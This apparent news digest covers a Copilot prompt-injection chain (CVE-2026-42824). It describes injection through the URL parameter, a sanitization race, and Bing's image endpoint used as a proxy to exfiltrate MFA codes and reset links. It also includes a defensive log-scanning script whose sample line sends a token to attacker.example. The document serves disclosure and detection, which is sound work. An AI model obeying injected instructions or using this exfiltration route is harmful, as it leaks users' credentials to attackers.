The Hacker News web signal

Microsoft Copilot Bug Leaks MFA Codes via One Click

microsoft cybersecurity enterprise ai ai-security enterprise-ai copilot vulnerability

Key insights

  • CVE-2026-42824 chains three Copilot bugs, enabling one-click theft of MFA codes, password-reset links, and SharePoint files from any signed-in victim.
  • Bing's image endpoint acts as an exfiltration proxy under the page's CSP allowlist, making stolen data invisible to URL-based anti-phishing filters.
  • Varonis has now disclosed three Copilot prompt injection attacks of the same class, including EchoLeak (CVE-2025-32711) and the Reprompt attack on Copilot Personal.

Why this matters

Microsoft 365 Copilot Enterprise Search's access to Microsoft Graph means a single exploit can reach email, MFA codes, calendar entries, and cloud files within one authenticated session, so the real blast radius is far larger than CVSS scores of 6.5 and 7.5 suggest. The Bing image-endpoint route shows that a CSP allowlist limited to first-party Microsoft infrastructure does not bound where data can go: any allowlisted host that fetches arbitrary URLs on the client's behalf is an exfiltration proxy, which undermines the common enterprise assumption that trusted-domain allowlisting is a sufficient egress control. Varonis's three successive Copilot disclosures in the same prompt injection class signal that AI assistant search surfaces need dedicated red-team coverage, not just standard application security review.

Summary

Microsoft 365 Copilot Enterprise Search contained a three-bug chain that let an attacker steal MFA codes, password-reset links, and SharePoint files with a single click on a crafted Copilot URL. Varonis Threat Labs researcher Dolev Taler built the exploit by combining prompt injection via Copilot's URL parameter, a browser race condition that fires image requests before sanitization completes, and a CSP bypass that turns Bing's image endpoint into an exfiltration proxy. Because the stolen data travels inside a request to Bing's own server-side image fetch, a destination the page's CSP already allows, standard URL-based phishing filters see no suspicious destination. According to Varonis and Microsoft, the fix was fully server-side and required no patch or user action, and no exploitation in the wild was observed.

  • CVE-2026-42824 carries CVSS scores of 6.5 (Microsoft) and 7.5 (NVD), a notable split on a flaw Microsoft itself rates critical.
  • Varonis has now disclosed three attacks of this Copilot prompt injection class, including EchoLeak (CVE-2025-32711) and the earlier Reprompt attack on Copilot Personal.
  • The victim's own Microsoft Graph permissions set the blast radius: email, calendar, MFA codes, and cloud files are all in scope.

Three disclosures in the same attack class point to a structural prompt injection surface in Copilot that no single fix has fully closed.
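The CSP point in "Why this matters" and the exfiltration step of the chain above can be made concrete with a hunting script. This is an added example, not code from the article, Varonis, or Microsoft: the proxy host `img-proxy.example.net`, its `u` parameter, the `TRUSTED_SUFFIXES` list, the `ts client method url status` log format, and the sample log lines are all placeholders constructed for the illustration (the article does not give the real Bing endpoint). It shows why a host-level check such as a CSP `img-src` allowlist passes the malicious request, and how following one level of proxying to the effective destination catches it in web-proxy logs.

```python
"""Hunting for exfiltration through an allowlisted image-fetching proxy.

Constructed example. The proxy host, query parameter, trusted suffixes
and log format are placeholders, and the log lines are made up.
"""
from urllib.parse import urlsplit, parse_qs

# Hypothetical server-side image fetcher that the page's CSP allows:
# the proxy downloads whatever URL is in its ``u`` parameter.
PROXY_HOST = "img-proxy.example.net"
PROXY_PARAM = "u"

# Hosts the organisation treats as first party for images (placeholders).
TRUSTED_SUFFIXES = ("example.net", "sharepoint.example.com")


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def is_trusted(host, suffixes=TRUSTED_SUFFIXES):
    """True if host equals, or is a subdomain of, one of the suffixes."""
    return any(host == s or host.endswith("." + s) for s in suffixes)


def csp_allows_img(url, img_src_hosts):
    """Host-level check, the way a CSP img-src allowlist or a URL-based
    filter judges the request: only the request's own host is consulted,
    never what the allowlisted host will fetch next."""
    return is_trusted(host_of(url), tuple(img_src_hosts))


def proxy_fetch_target(url):
    """Return the URL the proxy would fetch on the client's behalf, or None.
    parse_qs percent-decodes the parameter once, which is all we want."""
    if host_of(url) != PROXY_HOST:
        return None
    values = parse_qs(urlsplit(url).query).get(PROXY_PARAM)
    return values[0] if values else None


def effective_destination(url):
    """Follow one level of proxying to find where the data actually ends up."""
    target = proxy_fetch_target(url)
    return target if target else url


def analyse_request(url):
    """Flag an image request whose effective destination is not trusted."""
    dest = effective_destination(url)
    dest_host = host_of(dest)
    if is_trusted(dest_host):
        return None
    return {
        "request_host": host_of(url),
        "destination_host": dest_host,
        # Anything the attacker wanted to exfiltrate rides in the query.
        "smuggled_bytes": len(urlsplit(dest).query),
        "via_proxy": dest != url,
    }


def scan_log(lines):
    """Run analyse_request over 'ts client method url status' log lines."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5 or fields[2] != "GET":
            continue
        finding = analyse_request(fields[3])
        if finding:
            finding["client"] = fields[1]
            findings.append(finding)
    return findings


# Constructed log lines (not from any real deployment).
SAMPLE_LOG = [
    "2026-04-01T09:00:01Z 10.0.0.12 GET https://img-proxy.example.net/fetch?u=https%3A%2F%2Fsharepoint.example.com%2Flogo.png 200",
    "2026-04-01T09:00:02Z 10.0.0.12 GET https://img-proxy.example.net/fetch?u=https%3A%2F%2Fattacker.example%2Fc%3Fd%3DMFA-482913-reset-token-abc 200",
    "2026-04-01T09:00:03Z 10.0.0.12 GET https://sharepoint.example.com/banner.png 200",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The second sample line is the interesting one: `csp_allows_img` accepts it because the request host is the allowlisted proxy, yet `scan_log` flags it because the proxy's fetch target is an untrusted host carrying data in its query string. The durable fix belongs on the proxy (fetch only allowlisted origins, or only URLs it has signed itself); a log hunt like this is a compensating check for the unpatched window, and it must be adapted to how the real endpoint encodes its target.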

Potential risks and opportunities

Risks

  • Enterprise organizations running Microsoft 365 Copilot Enterprise Search face retroactive audit pressure if compliance or legal teams determine MFA codes or password-reset links were accessible during the unpatched window
  • Microsoft's lower CVSS score of 6.5 vs. NVD's 7.5 for CVE-2026-42824 could lead security teams to under-prioritize incident investigation if they relied on Microsoft's rating alone
  • The Bing image-endpoint exfiltration channel, if not specifically restricted for all Copilot surfaces, can be reused in future prompt injection attacks beyond Enterprise Search

Opportunities

  • Varonis Threat Labs strengthens its enterprise AI security position with three successive Copilot prompt injection disclosures, giving it a concrete differentiation story in Microsoft 365 security sales cycles
  • Enterprise browser isolation vendors can position agent-aware CSP enforcement as a gap-closer for first-party-CDN exfiltration routes, using this disclosure as a live example
  • Microsoft could build a dedicated bug bounty tier for Copilot prompt injection chains, since three disclosures in the same class demonstrate the surface is broader than point-fix remediation can address

What we don't know yet

  • Whether Microsoft has audited other Copilot URL parameters and surfaces beyond the 'q' parameter for similar prompt injection flaws following this disclosure
  • Whether the Bing server-side image fetch endpoint has been rate-limited or otherwise restricted as an exfiltration channel, or remains usable for similar attacks on other Copilot surfaces
  • How long CVE-2026-42824 existed before Varonis discovered it, and whether access logs from the unpatched window could confirm or rule out prior exploitation